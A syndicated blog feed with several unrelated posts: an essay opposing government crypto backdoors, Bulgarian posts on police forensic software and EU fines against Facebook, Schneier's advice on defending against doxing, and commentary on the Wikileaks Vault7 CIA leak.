Yes, government should do what they can to protect us from terrorists, but no, it’s not so bad of a threat that requires the imposition of a military/police state. When people use terrorism to justify their actions, it’s because they trying to form a military/police state.
A similar argument works with child porn. Here’s the thing: the pervs aren’t exchanging child porn using the services Rosenstein wants to backdoor, like Apple’s Facetime or Facebook’s WhatsApp. Instead, they are exchanging child porn using custom services they build themselves.
Again, I’m (mostly) on the side of the FBI. I support their idea of buying 0day exploits in order to hack the web browsers of visitors to the secret “PlayPen” site. This is something that’s narrow to this problem and doesn’t endanger the innocent. On the other hand, their calls for crypto backdoors endangers the innocent while doing effectively nothing to address child porn.
Terrorists and child molesters are a clichéd, non-serious excuse to appeal to our emotions to give up our rights. We should not give in to such emotions.

Definition of “backdoor”

Rosenstein claims that we shouldn’t call backdoors “backdoors”:

No one calls any of those functions [like key recovery] a “back door.”  In fact, those capabilities are marketed and sought out by many users.

He’s partly right in that we rarely refer to PGP’s key escrow feature as a “backdoor”.

But that’s because the term “backdoor” refers less to how it’s done and more to who is doing it. If I set up a recovery password with Apple, I’m the one doing it to myself, so we don’t call it a backdoor. If it’s the police, spies, hackers, or criminals, then we call it a “backdoor” — even it’s identical technology.

Wikipedia uses the key escrow feature of the 1990s Clipper Chip as a prime example of what everyone means by “backdoor“. By “no one”, Rosenstein is including Wikipedia, which is obviously incorrect.

Though in truth, it’s not going to be the same technology. The needs of law enforcement are different than my personal key escrow/backup needs. In particular, there are unsolvable problems, such as a backdoor that works for the “legitimate” law enforcement in the United States but not for the “illegitimate” police states like Russia and China.

I feel for Rosenstein, because the term “backdoor” does have a pejorative connotation, which can be considered unfair. But that’s like saying the word “murder” is a pejorative term for killing people, or “torture” is a pejorative term for torture. The bad connotation exists because we don’t like government surveillance. I mean, honestly calling this feature “government surveillance feature” is likewise pejorative, and likewise exactly what it is that we are talking about.

Providers

Rosenstein focuses his arguments on “providers”, like Snapchat or Apple. But this isn’t the question.

The question is whether a “provider” like Telegram, a Russian company beyond US law, provides this feature. Or, by extension, whether individuals should be free to install whatever software they want, regardless of provider.

Telegram is a Russian company that provides end-to-end encryption. Anybody can download their software in order to communicate so that American law enforcement can’t eavesdrop. They aren’t going to put in a backdoor for the U.S. If we succeed in putting backdoors in Apple and WhatsApp, all this means is that criminals are going to install Telegram.

If the, for some reason, the US is able to convince all such providers (including Telegram) to install a backdoor, then it still doesn’t solve the problem, as uses can just build their own end-to-end encryption app that has no provider. It’s like email: some use the major providers like GMail, others setup their own email server.

Ultimately, this means that any law mandating “crypto backdoors” is going to target users not providers. Rosenstein tries to make a comparison with what plain-old telephone companies have to do under old laws like CALEA, but that’s not what’s happening here. Instead, for such rules to have any effect, they have to punish users for what they install, not providers.

This continues the argument I made above. Government backdoors is not something that forces Internet services to eavesdrop on us — it forces us to help the government spy on ourselves.
Rosenstein tries to address this by pointing out that it’s still a win if major providers like Apple and Facetime are forced to add backdoors, because they are the most popular, and some terrorists/criminals won’t move to alternate platforms. This is false. People with good intentions, who are unfairly targeted by a police state, the ones where police abuse is rampant, are the ones who use the backdoored products. Those with bad intentions, who know they are guilty, will move to the safe products. Indeed, Telegram is already popular among terrorists because they believe American services are already all backdoored. 
Rosenstein is essentially demanding the innocent get backdoored while the guilty don’t. This seems backwards. This is backwards.

Apple is morally weak

The reason I’m writing this post is because Rosenstein makes a few claims that cannot be ignored. One of them is how he describes Apple’s response to government insistence on weakening encryption doing the opposite, strengthening encryption. He reasons this happens because:

Of course they [Apple] do. They are in the business of selling products and making money. 

We [the DoJ] use a different measure of success. We are in the business of preventing crime and saving lives. 

He swells in importance. His condescending tone ennobles himself while debasing others. But this isn’t how things work. He’s not some white knight above the peasantry, protecting us. He’s a beat cop, a civil servant, who serves us.

A better phrasing would have been:

They are in the business of giving customers what they want.

We are in the business of giving voters what they want.

Both sides are doing the same, giving people what they want. Yes, voters want safety, but they also want privacy. Rosenstein imagines that he’s free to ignore our demands for privacy as long has he’s fulfilling his duty to protect us. He has explicitly rejected what people want, “we use a different measure of success”. He imagines it’s his job to tell us where the balance between privacy and safety lies. That’s not his job, that’s our job. We, the people (and our representatives), make that decision, and it’s his job is to do what he’s told. His measure of success is how well he fulfills our wishes, not how well he satisfies his imagined criteria.

That’s why those of us on this side of the debate doubt the good intentions of those like Rosenstein. He criticizes Apple for wanting to protect our rights/freedoms, and declare they measure success differently.

They are willing to be vile

Rosenstein makes this argument:

Companies are willing to make accommodations when required by the government. Recent media reports suggest that a major American technology company developed a tool to suppress online posts in certain geographic areas in order to embrace a foreign government’s censorship policies. 

Let me translate this for you:

Companies are willing to acquiesce to vile requests made by police-states. Therefore, they should acquiesce to our vile police-state requests.

It’s Rosenstein who is admitting here is that his requests are those of a police-state.

Constitutional Rights

Rosenstein says:

There is no constitutional right to sell warrant-proof encryption.

Maybe. It’s something the courts will have to decide. There are many 1st, 2nd, 3rd, 4th, and 5th Amendment issues here.
The reason we have the Bill of Rights is because of the abuses of the British Government. For example, they quartered troops in our homes, as a way of punishing us, and as a way of forcing us to help in our own oppression. The troops weren’t there to defend us against the French, but to defend us against ourselves, to shoot us if we got out of line.

And that’s what crypto backdoors do. We are forced to be agents of our own oppression. The principles enumerated by Rosenstein apply to a wide range of even additional surveillance. With little change to his speech, it can equally argue why the constant TV video surveillance from 1984 should be made law.

Let’s go back and look at Apple. It is not some base company exploiting consumers for profit. Apple doesn’t have guns, they cannot make people buy their product. If Apple doesn’t provide customers what they want, then customers vote with their feet, and go buy an Android phone. Apple isn’t providing encryption/security in order to make a profit — it’s giving customers what they want in order to stay in business.
Conversely, if we citizens don’t like what the government does, tough luck, they’ve got the guns to enforce their edicts. We can’t easily vote with our feet and walk to another country. A “democracy” is far less democratic than capitalism. Apple is a minority, selling phones to 45% of the population, and that’s fine, the minority get the phones they want. In a Democracy, where citizens vote on the issue, those 45% are screwed, as the 55% impose their will unwanted onto the remainder.

That’s why we have the Bill of Rights, to protect the 49% against abuse by the 51%. Regardless whether the Supreme Court agrees the current Constitution, it is the sort right that might exist regardless of what the Constitution says. 

Obliged to speak the truth

Here is the another part of his speech that I feel cannot be ignored. We have to discuss this:

Those of us who swear to protect the rule of law have a different motivation.  We are obliged to speak the truth.

The truth is that “going dark” threatens to disable law enforcement and enable criminals and terrorists to operate with impunity.

This is not true. Sure, he’s obliged to say the absolute truth, in court. He’s also obliged to be truthful in general about facts in his personal life, such as not lying on his tax return (the sort of thing that can get lawyers disbarred).

But he’s not obliged to tell his spouse his honest opinion whether that new outfit makes them look fat. Likewise, Rosenstein knows his opinion on public policy doesn’t fall into this category. He can say with impunity that either global warming doesn’t exist, or that it’ll cause a biblical deluge within 5 years. Both are factually untrue, but it’s not going to get him fired.

And this particular claim is also exaggerated bunk. While everyone agrees encryption makes law enforcement’s job harder than with backdoors, nobody honestly believes it can “disable” law enforcement. While everyone agrees that encryption helps terrorists, nobody believes it can enable them to act with “impunity”.

I feel bad here. It’s a terrible thing to question your opponent’s character this way. But Rosenstein made this unavoidable when he clearly, with no ambiguity, put his integrity as Deputy Attorney General on the line behind the statement that “going dark threatens to disable law enforcement and enable criminals and terrorists to operate with impunity”. I feel it’s a bald face lie, but you don’t need to take my word for it. Read his own words yourself and judge his integrity.

Conclusion

Rosenstein’s speech includes repeated references to ideas like “oath”, “honor”, and “duty”. It reminds me of Col. Jessup’s speech in the movie “A Few Good Men”.

If you’ll recall, it was rousing speech, “you want me on that wall” and “you use words like honor as a punchline”. Of course, since he was violating his oath and sending two privates to death row in order to avoid being held accountable, it was Jessup himself who was crapping on the concepts of “honor”, “oath”, and “duty”.

And so is Rosenstein. He imagines himself on that wall, doing albeit terrible things, justified by his duty to protect citizens. He imagines that it’s he who is honorable, while the rest of us not, even has he utters bald faced lies to further his own power and authority.

We activists oppose crypto backdoors not because we lack honor, or because we are criminals, or because we support terrorists and child molesters. It’s because we value privacy and government officials who get corrupted by power. It’s not that we fear Trump becoming a dictator, it’s that we fear bureaucrats at Rosenstein’s level becoming drunk on authority — which Rosenstein demonstrably has. His speech is a long train of corrupt ideas pursuing the same object of despotism — a despotism we oppose.

In other words, we oppose crypto backdoors because it’s not a tool of law enforcement, but a tool of despotism.

Не, ГДБОП няма да ви шпионира чатовете

Post Syndicated from Bozho original https://blog.bozho.net/blog/2851

Тези дни се пови новина, че „ГДБОП вече може да шпионира „Вайбър“, „Фейсбук“ и „Скайп““. Разбира се, това не е вярно. ГДБОП няма да може да шпионира нищо. Самата статия също отбелязва, че от спецификацията не става ясно дали става дума за иззети мобилни устройства, или за следенето им в реално време. Заглавието обаче е гръмко и предполага шпиониране.

От спецификацията все пак става сравнително ясно, а когато разгледаме спечелилия софтуер (Oxygen Forensic), съвсем ясно, че става въпрос за извличане на информация от устройства, които са под физическия контрол на разследващите органи (т.е. иззети като доказателства). Софтуерът позволява извличане на контакти и съобщения (не е ясно с каква успеваемост, тъй като ФБР се затрудни доста в извличането на криптирани данни от iPhone наскоро).

Следене на тази комуникация, без устройството да е физически под контрола на органите, е възможно единствено ако на него е инсталиран шпионски софтуер. Oxygen Forensics (както подсказва и името), не е такъв. А инсталирането на шпионски софтуер е по същество СРС и изисква съдебно решение. Т.е. дори съдът да ги подписва на килограм (както по времето на Цветанов), масово следене не може да има. Освен това няма гаранция, че ще телефонът ви ще бъде заразен, особено ако имате добра потребителска култура. Също така, шпионски софтуер не би бил купен с открита обществена поръчка, най-малкото защото Apple и Google веднага биха запушили евентуални дупки в сигурността като разберат, че е възможно устройствата да се „шпионират“.

Четенето на съобщения „в движение“, т.е. чрез прихващане на комуникацията между устройствата и сървърите, е невъзможна, поне при най-популярните приложения. Всички използват криптирана връзка със сървъра, като някои (като Signal, WhatsApp и Telegram) криптират връзката „от край до край“ – т.е. дори сървърът, през който минават съобщенията, няма как да прочете какво пише в съобщенията. Единствено изпращачът и получателят могат. Защо да няма как? Защото математическите задачи, които са в основата на това криптиране (или „шифриране“), са нерешими със съвременните компютри (поне не в разумни периоди от време).

Защо трябва да се явявам като пиар на ГДБОП, вместо те да разяснят случая с прессъобщение, е друга тема. Но темата за защитата на личното пространство е важна. От тази гледна точка е чудесно, че медиите я следят. От друга гледна точка, не е добре заглавието да е дезинформиращо.

Та – ГДБОП няма да може да ни шпионира чатовете. Не че не биха искали – просто няма технологична възможност. Но е важно да следим както поръчките, така и законодателството – защото през годините имаше не един и два опита в Закона за електронните съобщения да бъдат прокарани текстове, с които органите и службите да могат да получават информация от мобилни и интернет доставчици. До момента тези опити без особен успех, но ще продължат, под претекста „национална сигурност“.

Всъщност, миналата есен бяха приети изменения в Закона за защита при бедствия, които на практика бяха изменения на Закона за електронните съобщения и дадоха възможност на „Пожарна безопасност“ да изисква трафични данни в случай на бедстващо лице (например, ако се загуби в планината). Измененията бяха приети по бързата процедура (в рамките на едно пленарно заседание). На пръв поглед проблем няма, тъй като в такива случаи наистина би било животоспасяващо мобилните оператори да дадат бързо информация за последното местоположение на дадена SIM-карта. Въпросът, както винаги е, дали няма как да се злоупотреби.

И накрая една препоръка – най-сигурните приложения за изпращане на съобщения са Signal и WhatsApp (който използва същия протокол като Signal), следвани от Telegram и Viber (макар при тях да има известни спорове (Telegram, Viber).

Facebook / WhatsApp: ЕК налага глоба по регламента за сливанията

Post Syndicated from nellyo original https://nellyo.wordpress.com/2017/05/18/facebook-whatsapp-%D0%B5%D0%BA-%D0%BD%D0%B0%D0%BB%D0%B0%D0%B3%D0%B0-%D0%B3%D0%BB%D0%BE%D0%B1%D0%B0-%D0%BF%D0%BE-%D1%80%D0%B5%D0%B3%D0%BB%D0%B0%D0%BC%D0%B5%D0%BD%D1%82%D0%B0-%D0%B7%D0%B0-%D1%81/

Европейската комисия взема решение да наложи на Facebook  глоба в размер 110 милиона евро за предоставяне на неточна или подвеждаща информация относно придобиването от Facebook на WhatsApp. Според комисаря по конкуренцията Вестагер Комисията трябва да може да взема решения относно въздействието на сливанията върху конкуренцията при пълното познаване на точните факти.

За първи път Комисията налага глоба на дружество за предоставяне на невярна или подвеждаща информация след влизането в сила на Регламента за сливанията от 2004 г. Решението на ЕК не е свързано с въпроси, свързани с неприкосновеността на личния живот, защитата на данните или защитата на потребителите, които могат да възникнат  относно Facebook / WhatsApp, нито с процедури на национално ниво в ЕС.

Съгласно Регламента за сливанията Комисията може да налага глоби в размер до 1% от общия оборот на дружествата, които умишлено или по непредпазливост предоставят на Комисията неточна или подвеждаща информация. В случая невярна и подвеждаща инфорпмация е предоставена два пъти – във формуляра за уведомление за сливане от 2014 и в отговора на искане на Комисията за информация от 2016.

Медиите отбелязват, че това е поредният технологичен гигант, с който се занимава ЕК –  след  Amazon и Apple и при  текущи процедури срещу Google.

Съобщението на ЕК

Filed under: Digital, EU Law

ЕС: Facebook и личните данни

Post Syndicated from nellyo original https://nellyo.wordpress.com/2017/05/17/%D0%B5%D1%81-facebook-%D0%B8-%D0%BB%D0%B8%D1%87%D0%BD%D0%B8%D1%82%D0%B5-%D0%B4%D0%B0%D0%BD%D0%BD%D0%B8/

На Facebook е наложена глоба от 150 000 евро във Франция. Френският регулатор в областта на личните данни  CNIL  констатира шест нарушения, включително събиране на информация за потребителите за реклама “без правно основание”. Установено е проследяване на потребителите, докато сърфират в мрежата. Потребителите нямат контрол върху използването на личните им данни, според  изявление на регулатора от 16 май 2017. 

FT съобщава, че подобно е становището на регулатора в Белгия, в Холандия е установено разполагане на реклами според заявените сексуални предпочитания, а WhatsApp е глобена 3 милиона евро в Италия – тъй като условията за ползване включват задължително съгласие  за обмен на данни с Facebook, компанията – собственик на WhatsApp.

Френският регулатор работи съвместно с регулаторите в областта на личните данни в Холандия, Германия, Белгия, Испания и др.

Източник FT

Filed under: Digital, EU Law

ЕК се активизира към Facebook, Twitter и Google

Post Syndicated from nellyo original https://nellyo.wordpress.com/2017/03/18/google-facebook/

В края на миналата година в  Ню Йорк Таймс се появи статия с красноречиво заглавие – Забравете за AT&T. Реалните монополи са Google и Facebook.

Поводът беше предполагаемата сделка между AT&T и Time Warner – но ако се интересуваме от медийни монополи, да погледнем към Силициевата долина, написа Ню Йорк Таймс , компаниите с господстващо положение в разпространението на медийно съдържание в наши дни са  Facebook, Google, Apple и Amazon.

Не става дума само за журналистически публикации.

Eвропейската комисия в последно време  предприема действия както по линията на конкурентното право, така и по линията на защита на потребителите, които заслужават отбелязване:

  • Що се отнася до защитата на конкуренцията, за Google в Европа се е писало доста, темата е преференциално третиране на собствени продукти и услуги.  За Facebook  актуална тема е сделката с WhatsApp.
  • Но сега има и втора линия на активни действия: според съобщение от 17 март 2017 г.  Европейската комисия и органите за защита на потребителите на държавите  изискват от дружествата, управляващи социалните медии, да спазват правилата на ЕС за защита на потребителите. Тук вече се засягат Facebook, Twitter и Google +.

 

 

Filed under: Digital, EU Law, Media Law

Defense against Doxing

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/03/defense_against.html

A decade ago, I wrote about the death of ephemeral conversation. As computers were becoming ubiquitous, some unintended changes happened, too. Before computers, what we said disappeared once we’d said it. Neither face-to-face conversations nor telephone conversations were routinely recorded. A permanent communication was something different and special; we called it correspondence.

The Internet changed this. We now chat by text message and e-mail, on Facebook and on Instagram. These conversations — with friends, lovers, colleagues, fellow employees — all leave electronic trails. And while we know this intellectually, we haven’t truly internalized it. We still think of conversation as ephemeral, forgetting that we’re being recorded and what we say has the permanence of correspondence.

That our data is used by large companies for psychological manipulation ­– we call this advertising –­ is well known. So is its use by governments for law enforcement and, depending on the country, social control. What made the news over the past year were demonstrations of how vulnerable all of this data is to hackers and the effects of having it hacked, copied, and then published online. We call this doxing.

Doxing isn’t new, but it has become more common. It’s been perpetrated against corporations, law firms, individuals, the NSA and — just this week — the CIA. It’s largely harassment and not whistleblowing, and it’s not going to change anytime soon. The data in your computer and in the cloud are, and will continue to be, vulnerable to hacking and publishing online. Depending on your prominence and the details of this data, you may need some new strategies to secure your private life.

There are two basic ways hackers can get at your e-mail and private documents. One way is to guess your password. That’s how hackers got their hands on personal photos of celebrities from iCloud in 2014.

How to protect yourself from this attack is pretty obvious. First, don’t choose a guessable password. This is more than not using “password1” or “qwerty”; most easily memorizable passwords are guessable. My advice is to generate passwords you have to remember by using either the XKCD scheme or the Schneier scheme, and to use large random passwords stored in a password manager for everything else.

Second, turn on two-factor authentication where you can, like Google’s 2-Step Verification. This adds another step besides just entering a password, such as having to type in a one-time code that’s sent to your mobile phone. And third, don’t reuse the same password on any sites you actually care about.

You’re not done, though. Hackers have accessed accounts by exploiting the “secret question” feature and resetting the password. That was how Sarah Palin’s e-mail account was hacked in 2008. The problem with secret questions is that they’re not very secret and not very random. My advice is to refuse to use those features. Type randomness into your keyboard, or choose a really random answer and store it in your password manager.

Finally, you also have to stay alert to phishing attacks, where a hacker sends you an enticing e-mail with a link that sends you to a web page that looks almost like the expected page, but which actually isn’t. This sort of thing can bypass two-factor authentication, and is almost certainly what tricked John Podesta and Colin Powell.

The other way hackers can get at your personal stuff is by breaking in to the computers the information is stored on. This is how the Russians got into the Democratic National Committee’s network and how a lone hacker got into the Panamanian law firm Mossack Fonseca. Sometimes individuals are targeted, as when China hacked Google in 2010 to access the e-mail accounts of human rights activists. Sometimes the whole network is the target, and individuals are inadvertent victims, as when thousands of Sony employees had their e-mails published by North Korea in 2014.

Protecting yourself is difficult, because it often doesn’t matter what you do. If your e-mail is stored with a service provider in the cloud, what matters is the security of that network and that provider. Most users have no control over that part of the system. The only way to truly protect yourself is to not keep your data in the cloud where someone could get to it. This is hard. We like the fact that all of our e-mail is stored on a server somewhere and that we can instantly search it. But that convenience comes with risk. Consider deleting old e-mail, or at least downloading it and storing it offline on a portable hard drive. In fact, storing data offline is one of the best things you can do to protect it from being hacked and exposed. If it’s on your computer, what matters is the security of your operating system and network, not the security of your service provider.

Consider this for files on your own computer. The more things you can move offline, the safer you’ll be.

E-mail, no matter how you store it, is vulnerable. If you’re worried about your conversations becoming public, think about an encrypted chat program instead, such as Signal, WhatsApp or Off-the-Record Messaging. Consider using communications systems that don’t save everything by default.

None of this is perfect, of course. Portable hard drives are vulnerable when you connect them to your computer. There are ways to jump air gaps and access data on computers not connected to the Internet. Communications and data files you delete might still exist in backup systems somewhere — either yours or those of the various cloud providers you’re using. And always remember that there’s always another copy of any of your conversations stored with the person you’re conversing with. Even with these caveats, though, these measures will make a big difference.

When secrecy is truly paramount, go back to communications systems that are still ephemeral. Pick up the telephone and talk. Meet face to face. We don’t yet live in a world where everything is recorded and everything is saved, although that era is coming. Enjoy the last vestiges of ephemeral conversation while you still can.

This essay originally appeared in the Washington Post.

Some comments on the Wikileaks CIA/#vault7 leak

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/03/some-comments-on-wikileaks-ciavault7.html

I thought I’d write up some notes about the Wikileaks CIA “#vault7” leak. This post will be updated frequently over the next 24 hours.

The CIA didn’t remotely hack a TV. The docs are clear that they can update the software running on the TV using a USB drive. There’s no evidence of them doing so remotely over the Internet. If you aren’t afraid of the CIA breaking in an installing a listening device, then you should’t be afraid of the CIA installing listening software.

The CIA didn’t defeat Signal/WhatsApp encryption. The CIA has some exploits for Android/iPhone. If they can get on your phone, then of course they can record audio and screenshots. Technically, this bypasses/defeats encryption — but such phrases used by Wikileaks are highly misleading, since nothing related to Signal/WhatsApp is happening. What’s happening is the CIA is bypassing/defeating the phone. Sometimes. If they’ve got an exploit for it, or can trick you into installing their software.

There’s no overlap or turf war with the NSA. The NSA does “signals intelligence”, so they hack radios and remotely across the Internet. The CIA does “humans intelligence”, so they hack locally, with a human. The sort of thing they do is bribe, blackmail, or bedazzle some human “asset” (like a technician in a nuclear plant) to stick a USB drive into a slot. All the various military, law enforcement, and intelligence agencies have hacking groups to help them do their own missions.

The CIA isn’t more advanced than the NSA. Most of this dump is child’s play, simply malware/trojans cobbled together from bits found on the Internet. Sometimes they buy more advanced stuff from contractors, or get stuff shared from the NSA. Technologically, they are far behind the NSA in sophistication and technical expertise.

The CIA isn’t hoarding 0days. For one thing, few 0days were mentioned at all. The CIA’s techniques rely upon straightforward hacking, not super secret 0day hacking Second of all, they aren’t keeping 0days back in a vault somewhere — if they have 0days, they are using them.

The VEP process is nonsense. Activists keep mentioning the “vulnerability equities process”, in which all those interested in 0days within the government has a say in what happens to them, with the eventual goal that they be disclosed to vendors. The VEP is nonsense. The activist argument is nonsense. As far as I can tell, the VEP is designed as busy work to keep people away from those who really use 0days, such as the NSA and the CIA. If they spend millions of dollars buying 0days because it has that value in intelligence operations, they aren’t going to destroy that value by disclosing to a vendor. If VEP forces disclosure, disclosure still won’t happen, the NSA will simply stop buying vulns.

But they’ll have to disclose the 0days. Any 0days that were leaked to Wikileaks are, of course, no longer secret. Thus, while this leak isn’t an argument for unilateral disarmament in cyberspace, the CIA will have to disclose to vendor the vulns that are now in Russian hands, so that they can be fixed.

There’s no false flags. In several places, the CIA talks about making sure that what they do isn’t so unique, so it can’t be attributed to them. However, Wikileaks’s press release hints that the “UMBRAGE” program is deliberately stealing techniques from Russia to use as a false-flag operation. This is nonsense. For example, the DNC hack attribution was live command-and-control servers simultaneously used against different Russian targets — not a few snippets of code. [More here]

This hurts the CIA a lot. Already, one AV researcher has told me that a virus they once suspected came from the Russians or Chinese can now be attributed to the CIA, as it matches the description perfectly to something in the leak. We can develop anti-virus and intrusion-detection signatures based on this information that will defeat much of what we read in these documents. This would put a multi-year delay in the CIA’s development efforts. Plus, it’ll now go on a witch-hunt looking for the leaker, which will erode morale. Update: Three extremely smart and knowledgeable people who I respect disagree, claiming it won’t hurt the CIA a lot. I suppose I’m focusing on “hurting the cyber abilities” of the CIA, not the CIA as a whole, which mostly is non-cyber in function.

The CIA is not cutting edge. A few days ago, Hak5 started selling “BashBunny”, a USB hacking tool more advanced than the USB tools in the leak. The CIA seems to get most of their USB techniques from open-source projects, such Travis Goodpseeds “GoodFET” project.

The CIA isn’t spying on us. Snowden revealed how the NSA was surveilling all Americans. Nothing like that appears in the CIA dump. It’s all legitimate spy stuff (assuming you think spying on foreign adversaries is legitimate).

Update #2: How is hacking cars and phones not SIGINT (which is the NSA’s turf)?[*The answer is via physical access. For example, they might have a device that plugs into the ODBII port on the car that quickly updates the firmware of the brakes. Think of it as normal spy activity (e.g. cutting a victim’s brakes), but now with cyber.

Update #3: Apple iPhone. My vague sense is that CIA is more concerned about decrypting iPhones they get physical access to, rather than remotely hacking them and installing malware. CIA is HUMINT and covert ops, meaning they’ll punch somebody in the face, grab their iPhone, and run, then take it back to their lab and decrypt it.